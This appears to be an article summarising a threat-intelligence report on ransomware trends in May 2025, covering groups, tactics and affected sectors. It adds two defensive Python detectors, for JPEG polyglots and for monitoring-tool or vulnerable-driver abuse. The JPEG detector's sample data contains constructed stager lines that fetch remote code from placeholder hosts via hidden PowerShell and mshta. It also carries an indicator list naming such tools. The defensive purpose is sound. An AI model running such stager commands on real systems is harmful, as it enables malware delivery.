Ransomware Trends In May 2025

The ransomware landscape in May 2025, as detailed in Cyfirma's latest Tracking Ransomware: May 2025 report, shows a 15.9% rise in global incidents from April, with 545 attacks recorded. This escalation is part of a broader upward trend - 331 incidents in 2023, 520 in 2024 and now 545 in 2025, comparing the same month each year - that illustrates the growing audacity of cybercriminals.

The United States bore the brunt, with 272 victims, dwarfing Germany (31) and Canada (28), as shown in the report’s geographical analysis.

The preference for these nations reflects their wealth, data-rich enterprises and critical infrastructure, which make them ripe for high-stakes extortion. The concentration of attacks in the U.S. underlines its status as the prime target, driven by its economic weight and dependence on digital services.

Shifting Players, Evolving Tactics

The report illustrates a volatile ecosystem. Newcomers SafePay and SilentRansomGroup led with 72 and 67 attacks respectively, eclipsing established groups such as Qilin (down from 72 to 55 incidents), Play (51 to 44) and Akira (55 to 31). This shift points to the rapid rise of agile, aggressive actors. SafePay's meteoric ascent, with 198 victims since late 2024, relies on double extortion - encrypting systems and exfiltrating data - with initial access typically gained through vulnerable VPN appliances and exposed Remote Desktop Protocol (RDP) endpoints. SilentRansomGroup's sudden prominence may simply reflect a newly launched leak site, hinting that the group was active covertly before it started publishing victims.

Tactically, ransomware groups are growing more sophisticated. Qilin, for instance, has moved to Rust-based payloads and adopted loaders such as NETXLOADER and SmokeLoader, enabling stealthy in-memory execution, as detailed in the report's section on group evolution. A novel delivery method - ransomware embedded in JPEG images and paired with decoy documents - evades detection by exploiting user trust in common file formats. The report's analysis of the attack chain describes a stager script that runs when the image is opened and fetches the ransomware executable from a remote server.
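Images carrying a hidden payload are usually polyglots: a valid JPEG with executable or script data appended after the End-Of-Image marker, or tucked into a comment or APPn metadata segment. The following inspector, an added example written for this article and not code from the Cyfirma report, walks the JPEG marker structure to find where the real image ends and flags anything after it or any script-like strings in metadata segments. The sample JPEG skeleton, the appended "payload" and the indicator list are constructed for the example; the indicator strings are an assumption, not indicators published in the report.

```python
import re

# Marker bytes used by the parser (the byte that follows 0xFF).
EOI, SOS = 0xD9, 0xDA
STANDALONE = {0x01, *range(0xD0, 0xD8)}          # TEM and RST0-7 carry no length field
# Strings a dropper or stager would plausibly leave in appended data or a metadata
# segment. Assumed indicator list for this example, not taken from the report.
SCRIPT_RE = re.compile(rb"(?i)powershell|cmd\.exe|wscript|mshta|rundll32|https?://")


def parse_jpeg(data: bytes):
    """Walk the JPEG marker structure.

    Returns (end_of_image, segments): end_of_image is the offset just past the
    first real EOI marker; segments is a list of (marker, payload) for every
    length-prefixed segment. Raises ValueError on malformed input.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    segments = []
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:                         # fill byte, skip
            pos += 1
            continue
        if marker == EOI:
            return pos + 2, segments
        if marker in STANDALONE:
            pos += 2
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        seg_len = int.from_bytes(data[pos + 2:pos + 4], "big")
        segments.append((marker, data[pos + 4:pos + 2 + seg_len]))
        pos += 2 + seg_len
        if marker == SOS:
            # Entropy-coded data follows. 0xFF is escaped as FF00, RSTn markers
            # (FFD0-FFD7) and FFFF fill may appear; anything else is a real marker.
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt not in (0x00, 0xFF) and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("no EOI marker found")


def inspect_jpeg(data: bytes) -> dict:
    """Flag data appended after EOI and script-like content in APPn/COM segments."""
    end, segments = parse_jpeg(data)
    trailer = data[end:]
    findings = []
    if trailer.strip(b"\x00"):                     # ignore harmless zero padding
        findings.append("trailing_data")
        if trailer[:2] == b"MZ":
            findings.append("pe_header_after_eoi")
        if SCRIPT_RE.search(trailer):
            findings.append("script_or_url_after_eoi")
    for marker, payload in segments:
        if (marker == 0xFE or 0xE0 <= marker <= 0xEF) and SCRIPT_RE.search(payload):
            findings.append(f"script_or_url_in_segment_{marker:02X}")
    return {"image_bytes": end, "trailing_bytes": len(trailer), "findings": findings}


def build_sample_jpeg(comment: bytes = b"") -> bytes:
    """Constructed minimal JPEG skeleton (not a decodable picture) for offline testing."""
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    out = b"\xff\xd8\xff\xe0" + (len(app0) + 2).to_bytes(2, "big") + app0
    if comment:                                    # optional COM segment
        out += b"\xff\xfe" + (len(comment) + 2).to_bytes(2, "big") + comment
    sos = b"\x01\x01\x00\x00\x3f\x00"
    out += b"\xff\xda" + (len(sos) + 2).to_bytes(2, "big") + sos
    out += b"\x12\x34\xff\x00\x56\xff\xd0\x78"      # scan data with a stuffed FF00 and an RST0
    return out + b"\xff\xd9"


if __name__ == "__main__":
    clean = build_sample_jpeg()
    # Constructed polyglot: a fake PE stub plus a stager command line glued after EOI.
    # The payload itself contains FF D9, which a naive "find the last EOI" check would
    # mistake for the real end of the image.
    polyglot = clean + (b"MZ\x90\x00\xff\xd9This program cannot be run in DOS mode.\r\n"
                        b"powershell -nop -w hidden -c \"iwr http://example.invalid/s\"")
    for name, blob in (("clean", clean), ("polyglot", polyglot),
                       ("com-segment", build_sample_jpeg(b"mshta http://example.invalid/x.hta"))):
        print(name, inspect_jpeg(blob))
```

Run it over an image directory at the mail gateway or on a file share and any hit on `trailing_data` with `pe_header_after_eoi` is worth quarantining; the COM/APPn check catches the variant where the stager hides in metadata rather than after the image. Neither check proves a file is malicious (cameras and editors append metadata too), so treat the findings as triage signals, not verdicts.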

Additionally, groups such as Qilin - responsible for last year's damaging attack on London hospitals - and Hunters International abuse legitimate employee-monitoring software such as Kickidler for reconnaissance, harvesting credentials without triggering alerts because the tool is signed, commercially distributed and expected on some corporate endpoints, a tactic outlined in the report's technical analysis.

Industry Under Siege

The Professional Goods & Services sector faced the heaviest onslaught, with 94 incidents, followed by Consumer Goods (70) and Manufacturing (52), although the May attacks have a wide reach across finance, IT, real estate, and even less-targeted sectors like automotive and energy. Manufacturing’s vulnerability, noted in prior reports, stems from outdated software and the high cost of downtime, making it a perennial target.

The exploitation of the SAP NetWeaver vulnerability CVE-2025-31324 by groups such as Qilin and BianLian further amplifies the risk for enterprises that depend on complex, widely connected software ecosystems.

High-Profile Breaches & Broader Impacts

Key events in May 2025 highlight the stakes. Germany's public identification of Vitaly Kovalev as a ringleader behind Conti and TrickBot exposed the organised nature of these groups, with profits in the hundreds of millions. An Iranian national's guilty plea over the RobbinHood attacks on U.S. cities - which used a bring-your-own-vulnerable-driver (BYOVD) technique to disable antivirus protection - underscores the global reach of these threats. A ransomware attack on MathWorks disrupted its online services, while Kettering Health's outage, attributed to Interlock, crippled operations. The leak of VanHelsing's ransomware builder, detailed in the report, risks spawning copycat groups, echoing past leaks such as Babuk.
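Two of the techniques above, abuse of a legitimate monitoring tool (Kickidler) and BYOVD to blind endpoint protection, are both visible in ordinary endpoint telemetry if someone looks. The hunt below is an added example written for this article, not code or detection content from the Cyfirma report. It runs over constructed Sysmon-style records: Event ID 1 (process creation, with the Company/Product/Description fields Sysmon records) and Event ID 6 (driver loaded, with its Hashes and signature fields). The product watchlist, the sanctioned-host inventory, the file names and the driver hash are all assumptions for the example; the hash is a placeholder, not a real vulnerable driver.

```python
# Product strings to hunt for in Sysmon Event ID 1 Company/Product/Description/Image
# fields. Kickidler is the tool the report names; the other entries are assumptions.
MONITORING_PRODUCTS = ("kickidler", "anydesk", "screenconnect", "teamviewer")
# (product, host) pairs where a monitoring agent is sanctioned. Assumed inventory.
SANCTIONED = {("kickidler", "HR-KIOSK-01")}
# Parents that suggest an interactive or scripted drop rather than a managed install.
SUSPICIOUS_PARENTS = ("cmd.exe", "powershell.exe", "wscript.exe", "mshta.exe")
# SHA-256 of drivers known to be abusable (BYOVD). Placeholder value for the example;
# in practice populate this from a maintained feed of vulnerable drivers.
VULNERABLE_DRIVER_HASHES = {
    "0" * 63 + "1": "placeholder-vuln-driver.sys",
}


def hunt(events: list[dict]) -> list[dict]:
    """Return alerts for unsanctioned monitoring agents and known-abusable driver loads."""
    alerts = []
    for ev in events:
        host = ev["host"]
        if ev["event_id"] == 1:                       # process creation
            ident = " ".join(str(ev.get(k, "")) for k in
                             ("Image", "Company", "Product", "Description")).lower()
            for product in MONITORING_PRODUCTS:
                if product in ident and (product, host) not in SANCTIONED:
                    parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
                    alerts.append({
                        "host": host,
                        "kind": "unsanctioned_monitoring_tool",
                        "product": product,
                        "severity": "high" if parent in SUSPICIOUS_PARENTS else "medium",
                        "detail": f"{ev['Image']} launched by {parent or 'unknown'} as {ev.get('User', '?')}",
                    })
        elif ev["event_id"] == 6:                     # driver loaded
            hashes = dict(h.split("=", 1) for h in ev.get("Hashes", "").split(",") if "=" in h)
            sha256 = hashes.get("SHA256", "").lower()
            if sha256 in VULNERABLE_DRIVER_HASHES:
                alerts.append({
                    "host": host,
                    "kind": "known_vulnerable_driver",
                    "product": VULNERABLE_DRIVER_HASHES[sha256],
                    "severity": "high",
                    # A valid signature is expected here: BYOVD abuses drivers that are
                    # signed but exploitable, so Signed=true must not suppress the alert.
                    "detail": f"{ev['ImageLoaded']} signed={ev.get('Signed')} ({ev.get('Signature', '?')})",
                })
    return alerts


# Constructed sample telemetry (file names, hosts and users are made up).
SAMPLE_EVENTS = [
    {"host": "HR-KIOSK-01", "event_id": 1, "Image": r"C:\Program Files\Kickidler\agent.exe",
     "Company": "Kickidler", "Product": "Kickidler Agent", "Description": "Monitoring agent",
     "ParentImage": r"C:\Windows\System32\msiexec.exe", "User": "NT AUTHORITY\\SYSTEM"},
    {"host": "FS-01", "event_id": 1, "Image": r"C:\Users\jdoe\AppData\Local\Temp\grab.exe",
     "Company": "Kickidler", "Product": "Kickidler Agent", "Description": "Monitoring agent",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "User": "CORP\\jdoe"},
    {"host": "FS-01", "event_id": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "Company": "Microsoft Corporation", "Product": "Microsoft Windows Operating System",
     "Description": "Notepad", "ParentImage": r"C:\Windows\explorer.exe", "User": "CORP\\jdoe"},
    {"host": "FS-01", "event_id": 6, "ImageLoaded": r"C:\Windows\Temp\placeholder-vuln-driver.sys",
     "Hashes": "SHA1=" + "1" * 40 + ",SHA256=" + "0" * 63 + "1", "Signed": "true",
     "Signature": "Example Vendor Ltd"},
    {"host": "FS-01", "event_id": 6, "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys",
     "Hashes": "SHA256=" + "ab" * 32, "Signed": "true", "Signature": "Microsoft Windows"},
]

if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert)
```

The sanctioned agent on the kiosk produces nothing; the same product dropped into a user's Temp folder by PowerShell on a file server is a high-severity hit, and the signed driver with a known-bad hash is flagged regardless of its valid signature. Matching on vendor and product strings rather than on file names is deliberate: a renamed binary keeps its version resource, while a renamed file name is the first thing an intruder changes.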

The business impact is stark. According to the report's impact analysis, 31% of attacked enterprises halt operations, 40% downsize staff and 60% of affected small businesses close within six months, while the average cost per incident, put at $200,000, compounds the reputational and regulatory damage.

A Call for Resilience

The report's recommendations - robust cybersecurity controls, employee training and incident response planning - are urgent. As ransomware groups wield advanced tooling and exploit both human and technical weaknesses, organisations must prioritise patch management, network segmentation and multi-factor authentication on every remote-access path.

The May 2025 surge, driven by new players and stealthy tactics, signals a relentless threat. Proactive defence, rooted in threat intelligence and governance, is no longer optional but essential for survival against escalating cyber threats.

Image: Cyfirma
